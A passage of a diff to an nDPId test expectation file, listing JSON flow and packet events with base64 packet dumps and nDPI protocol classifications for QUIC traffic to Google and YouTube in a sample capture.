AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 02254{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1463060980460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980460,"pkt":"eJKcD6iO8IQvSpdgCABFAAVifaoAADIRmLPYOtLhwKgBaQG70jkFThU9AAFbOkhXLI3U967KCL3cJUfMqLc5FSrY4cYs3xypa7qHkPMQkfyihNqC28UhBOL3e\/5TBI7YTG0J23OmdlC7GgmCbVWFBre3mnIHOH5gNl6B4pV+JLE9LheDJBWLfps\/P5l5aMhy6p4xkqOtVn+84yrn69vnIGngY2UUctisj\/\/7qbGHoU7KjFVZvLiLnesCjZPEQ9bmtTdxJ8NIoohV99NBrL3ZR\/mRKqFg6ck1jjGMancWDX9uCodwuw+nFeiwhdNiUXqpCyb8WsgjNJlQgx5Jzfa6dxFwnJS2EsJzy1jow479DEUJQyupcHux9LBb4IxdT8f537ef70Ew4CvWu3Iba3a+sRfT8oSLt0CF8xrbGmeBEnSqbecBn6F2MYjUF2gtYKqmlv2GpssQgCf+y1IgiyKvJBAFYATvIM5Yoz\/5ASrdVp19my0ed8fkjXD\/9hI6BqGDwauf0bTx1RLAMhLrvl6pXAmkTiy9XjRAKtxJq+C1D4UKHSSI2+YjymrUAqCH3KRAZmA0Bxs3bF5O\/PSuozCEiM1fA6uKcRzdnnQiYy07+fjPtlVxQByhag2n\/cAPz+kuIj8MMSN1yDveDuOdF8jXFe5s9mrKD8JMfRZctDC3tl6y0RDe95cUiGF72q+hrAL\/PnaEp3C0gWLN0HrD0R9JOOxmp7Auh7povQU79kvL0xqyh4jnZ\/Eauv5xfJJ9WERDrqx3CTTuciqZlam2PDCCuo1MW4zttYvjA3nx3zF4aGwysEzvVFN3YL6hVQjdDA4G9W2+Ef0aVvJ6dwImjNYp4R0XlWhoyOCtNc6n9KHJ2lGiAOWbtoy+eIkUgerfolxpj29D8pTuvRSA6xSdgniEhkWz2S88FBK7lsS9dfKhGidfIxn3mpcstFKBaupKzVmBUCAqw1Z9aWdecUTnIY67owXaqxfverdyb0S4+uAKmDm4p8KZN+VbJFG\/ylg0sBWP80mInpEbGS7MrNOzG+nWmwobpNpDfkH6k4MJahEdbTJwc8F0zwrc9OBje09p8uO
+iXNyZJSmFPRBYsNZ4SG8aHlZEWwk1zN++dYeWoX+nUUYJD4SmFHSyUSfF3Ib+mhP8VYivL+Z49LFaGNAB7KGxHv6fvGdSutX9bFiP1ZkAEhpweNPt8+O3nQTWj927mHvqPFEoMfTdYknC6NXf1NUkjL0SCHGhtXTgom7sP8gds1oLZBN2H5EejX\/eUCiWr6Vz0O2ty3vLiEaKe45R6dpcVbZGDcZnogU1oKhCd5eIW5VCS9ZoxdQUXYVQ5OVZmD0+lXGLDhaxED1Sg0QBEID7Gyk3XlpIelSpdCcj7XZyy+fDz5peeAIHd7A\/NT1xszFkW3dJpaVelwRfVQ2Tajy6IY3aeRniays5OlSdDEGtZvz+UGoOACWTNtx+Bck5uH4c3U2F4B+CPTc7F0hvJL623HEU79LiEo5zzmsjK4jgrRtPE6Ujm4ZpuNfqh8tPnhC9+Bi2Aja+3eezVsTpRflcLiQs0+wiUrXwIMtQYHLDjHEkGkWCaZ1nNn1+gwpcra6WAb6OHVPMNzrYJK0SrAHU0\/USbaXPZLFNMj2alWPs47VfDow3\/W3uXsLSYKoanH+Y+vNHJPIWjV0xMRUN6pTJE7IVb0BTnZ7b0D3Y4\/SxaKloeNxIuesxRvodNcMI\/1buC5kqkJStpYaf7KVkJyh1GHdI8GrmxoF2MSLqGY6lT0vPgbFD4MZreGOa5Sssczsczl+luw+iYguWV7SHDSmHfZxeBgkr589fC51KvvuWXNd3GZS5QlUqIxlrJRMHt8X"} -00913{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1461850699450,"flow_last_seen":1461850703450,"flow_idle_time":200000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6820,"flow_avg_l4_payload_len":1136,"midstream":0,"thread_ts_msec":1463060980460,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00913{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1461850699450,"flow_last_seen":1461850703450,"flow_idle_time":200000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6820,"flow_avg_l4_payload_len":1136,"midstream":0,"thread_ts_msec":1463060980460,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","packets-captured":450,"packets-processed":449,"total-skipped-flows":0,"total-l4-payload-len":271275,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":9,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":50,"global_ts_msec":1463075953299} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463075953299,"flow_last_seen":1463075953299,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02241{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1463075953299,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463075953299,"pkt":"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\/wHogWCSkhroVzTEcXji0toaKKW2C\/sjLL4Hx\/uc6Fh9FqIQ4mtE7XBkAAAAQ0MyMENocm9tZS81MC4wLjI2NjEuMTAyIExpbnV4IHg4Nl82NO4xNazIxw51CPh92NozyjEAAAAAWDUwOQAAEAAeAAAAV2LXIh+dp84WNbuB7eLfYt7CEN3uuVCwsaMPVZLZkwAcWv3ewLeWKh8oWp+ADGqv7hr4e6BITFL34pf63u8lTgEAAABDMjU1Ve9eTSHF9WVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5CprnnrQX4AAJnDlbsORKBU4xOKlwWO9P4E5XFal5z7hzqpwhe\/gMX+Blclu+PZJjQ25zzFRxooIRN4BrBfLQmDdxaJYtqVNyhOzgBZdHzyh0tqgzeC9Fkja7K8HfjiuAyeK8FHD1egJgrMDFGpXlhTM816keOEywC8bzRfESJQUt0PZFKBRrh3m2XPL+hfh5e34YbH0wkaQLc6HM0z36TboZSwOAF93TLAofZgAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463075953299,"flow_last_seen":1463075953299,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"Chrome\/50.0.2661.102 Linux x86_64"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463075953299,"flow_last_seen":1463075953299,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"Chrome\/50.0.2661.102 Linux x86_64"}} 
00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1463075953300,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1463075953300,"pkt":"6HTmLPTkABlmWmaMCABFAAF1aTxAAEARYx3AqAFt2DrSzomkAbsBYbFkDby767UFbXetUTAzMAIyT2zFCwKRbjpW5pKGcwa\/zOYtI4ibM\/DXTo+3hM8QHjQop2VE57N\/4px1Dr2rh1Of6fuprsXKXOLDTQHDMOztLE0ibzNUs5cviwMINA8HUKs1w\/8wSCAJg+c5E0s64vzHKdQ5N4AY1I+whZj+YXv7QX9bQtyBCP0WJRsK41puLJyY\/5rYf1WXDzsnCxRRei33WDvMsb+MNKppe2kXK4Q1DqzsKviobjh+ZnTmMaJFKxfjljXwNv0dsW2Nhjh9NEpVNdRUHHe+L\/umz5nJPSc8m3xsZrs27PfAfYs3O4DQT7zrN+rUD1tvAlM6ojpuYBXQUKIqFg6jkPkLtz0lnT5ofUC3bxq1J8gFqtExK3aj\/kH0as9Y1tYZiRMdgBmqLNq1Ru6unJsdETbKAQha1+Pgo4qtxiVVhohC7TEjAQj3UwwRrwKowX6bUvpY"} 02251{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1463075953334,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463075953334,"pkt":"ABlmWmaM6HTmLPTkCABFAAViGxkAADQR+VPYOtLOwKgBbQG7iaQFTgWwDLy767UFbXetARhGCjp5JYP2NRSCDQGAAVJFSgAHAAAAU1RLADwAAABTTk8AdAAAAFBST0a7AAAAU0NGR04BAABSUkVKUgEAAENTQ1RGAgAAQ1JU\/xIGAAAt19AYB5aaMKurHRM81LpDG06F1\/HgjIAXnLSYHoaRDG+YCx4gYrs3k43pE\/W5utsyegd0CLIV4fasqoZkRpVLMtnpS+sIRqrbfvgjIL2IUeZTlSGu\/7+bU4Z+Ij1vgEEcToZ\/00OYAYgC+05liNl+ov97hTBFAiBs6kS1HuLjC8x7gQEfBCOAowmjvDZU885lgtcWaGEy0QIhAPm+1mJq5QK6WHRPaEUwOfyND\/8ufeGnt66391Aj9lqnU0NGRwcAAABBRUFECAAAAFNDSUQYAAAAUERNRBwAAABQVUJTPwAAAEtFWFNDAAAAT0JJVEsAAABFWFBZUwAAAEFFU0dDQzIwWGClOjtYNIHfmiHJ0bGFX0NISUQgAACup8alaVf8gP6KOzle5pjmXvoOKgb+N2LRgB5dcX8Ka0MyNTUSxc3dEjis6kATN1cAAAAADQAAAADyAHcA7ku9t3XOYLrhQmkfq+GeZqMPfl+wctiDAMR7iXqo\/csAAAFUe1HMJwAABAMASDBGAiEAqHfz
HEY9KN1QjXeaiZlcHt6ybhyDsnLIoo6e82Zg73ACIQCveMl0OwuTrVY5LqDcb5TIihLD6ZAJQlUDU68E5\/BK6AB3AN3rHSt6DU+mIIuBrYFocH4ujp0B1VyIjT0RxM227L7MAAABVHtRyfMAAAQDAEgwRgIhAMWc6riI2T4lmoQuPyvTrFTQuoCnh6VaWJBNwHgCZloKAiEAiHJhhSnJcrUXaDEZQLClSBLKToA3CEOVFu+IPvrOhh4BAwHogWCSkhroAwAAAAN7Junn5Fxx\/wAAAAAA\/wYAAHi7c1AtxPvNxgAsudi+GzSx3oe04Tic2NatWf922kf0hhwVG1mgwsAMmIdMgPkF1p4zMDcyN7AwtgR1otKwWsXBw+UMTDdp+UV5mYmwBMnOw+ubX5pXAkpdYZmp5XB38SC7S9RAGOwuHh4tYJiChMGRGwkUZgf68ZwtsPnBAWYwM7IzOzGwvF91fdMNT2Ud1a7MlSledVlybaZOW\/IT25eYrq8qUp7OLmq33YHB9tcRfpb4rOn2rfYyM5bOl9xpdepuGi\/LiYsHpi9uYuk3aGLpJlSANTGD+wiCLE3MrkCOYxOKA5t4tfQS81KK8jPBDZ4mMSC3oCA1Lz0zLxVZmZCWXnJOfmkKspgYzCDdxLzEnMqSzORisDg3woJEZE5OEx+S1XqZeaj8rAJUfml2Ez+yU\/USi9AFStEEktBVJOejCeRWoAmUoGspy0Nyc0oqEie1GImTVoTEyShF4mSWIHHycpA4BSicElCgQjiJKcAiABJ4cMdARPKaRGACQNncVGCLAqxMECZalpmSmg8WAsVrcQmwYEwGaeNF4gEluYDcshJDJLYRmA00PTe1pAioClk10Chg2yUjE1xANQmAeDloMV+ZX1pSmpSqm5efnJ+fnQlPTFBxNGWpKaWQKhyWQICpJTcdzJGCJ7+czNS8kmJke7iRkyYLSH0TG1Aa2MZpEsGa9LiQkyyWYONC8hYXuGiGmMYBdqdeEjC6kT0ggs35SA0q9gaDDKRiOQZYsGgjFbjy0DKwIDsTyVf67p6O7kbgElUbqQyHKYYGgyGyDlC5jtTI273NV8E2Yd+C1ye2dnFOb2eeVW6ug9bQQS6rsfaMFCEtB2DVhdYd4WBjS2\/kARbTBgaQ"} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1463060980356,"flow_last_seen":1463060980457,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5477,"flow_avg_l4_payload_len":912,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1463060980356,"flow_last_seen":1463060980457,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5477,"flow_avg_l4_payload_len":912,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463060980313,"flow_last_seen":1463060980404,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.3","src_port":40461,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463060980313,"flow_last_seen":1463060980404,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.3","src_port":40461,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1463060980349,"flow_last_seen":1463060980446,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":912,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1463060980336,"flow_last_seen":1463060980436,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6251,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1463060980301,"flow_last_seen":1463060980460,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4124,"flow_avg_l4_payload_len":824,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1463075953299,"flow_last_seen":1463075954300,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":55535,"flow_avg_l4_payload_len":804,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463060980378,"flow_last_seen":1463060980460,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1463060980364,"flow_last_seen":1463060980449,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1463060980349,"flow_last_seen":1463060980446,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":912,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1463060980336,"flow_last_seen":1463060980436,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6251,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1463060980301,"flow_last_seen":1463060980460,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4124,"flow_avg_l4_payload_len":824,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1463075953299,"flow_last_seen":1463075954300,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":55535,"flow_avg_l4_payload_len":804,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463060980378,"flow_last_seen":1463060980460,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1463060980364,"flow_last_seen":1463060980449,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463075954300,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":518,"source":"quic.pcap","alias":"nDPId-test","packets-captured":518,"packets-processed":518,"total-skipped-flows":0,"total-l4-payload-len":326810,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":10,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":65,"global_ts_msec":1463075954300} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ 
